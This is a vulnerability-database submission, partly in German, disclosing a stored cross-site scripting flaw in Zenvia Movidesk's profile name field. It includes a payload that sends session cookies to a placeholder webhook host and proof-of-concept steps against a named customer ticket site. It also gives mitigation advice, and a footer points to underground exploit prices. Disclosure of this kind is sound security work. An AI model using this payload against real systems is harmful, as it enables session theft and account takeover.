Submit #486023: zenvia movidesk 25.01.15.86c796efe6 Cross Site Scriptinginfo

Titelzenvia movidesk 25.01.15.86c796efe6 Cross Site Scripting
BeschreibungVulnerability Summary A stored XSS vulnerability was identified in Zenvia's Moviedesk system. The flaw occurs in the username field, allowing the injection of malicious code. When an attacker changes the profile name to contain an XSS payload, the code is stored in the system and executed automatically when other users access the ticket viewing page, enabling a zero-click Account Takeover (ATO) attack. Vulnerability Details Vulnerable endpoint (profile editing):https://service.sigmatelecom.com.br/Account/EditProfile Endpoint where the XSS is triggered (ticket view):https://service.sigmatelecom.com.br/Ticket Payload used: <img src="https://your-webhook.com/?cookie=" + `${document.cookie}`> Impact Automatic execution of malicious code upon viewing tickets; Theft of session cookies, enabling Account Takeover without user interaction (0-click); Compromise of accounts with access to ticket data; Privilege escalation if the attacker gains access to administrator credentials. Recommendations to mitigate this vulnerability, it is recommended to: Input sanitization: Implement strict filtering and validation of user inputs in the "Username" field. Output escaping: Ensure that all displayed data is properly escaped to prevent code execution. HTTPOnly cookies: Configure session cookies with the HttpOnly flag to prevent JavaScript access. Content Security Policy (CSP): Implement a restrictive CSP to mitigate unauthorized code execution. Security audits: Conduct regular security testing to identify similar vulnerabilities. Proof of Concept (PoC) Access the profile editing endpoint:https://service.sigmatelecom.com.br/Account/EditProfile Change the username to the following payload: <img src="https://your-webhook.com/?cookie=" + `${document.cookie}`> Save the changes. Access the ticket page:https://service.sigmatelecom.com.br/Ticket Observe that the payload is executed and cookies are sent to the webhook.
Quelle⚠️ https://service.sigmatelecom.com.br/Ticket
Benutzer
 y4g0 (UID 80480)
Einreichung21.01.2025 01:15 (vor 1 Jahr)
Moderieren02.02.2025 08:54 (12 days later)
StatusAkzeptiert
VulDB Eintrag294362 [Zenvia Movidesk bis 25.01.22 Profile Editing /Account/EditProfile Benutzername Cross Site Scripting]
Punkte17

ZurückÜbersichtWeiter

Interested in the pricing of exploits?

See the underground prices here!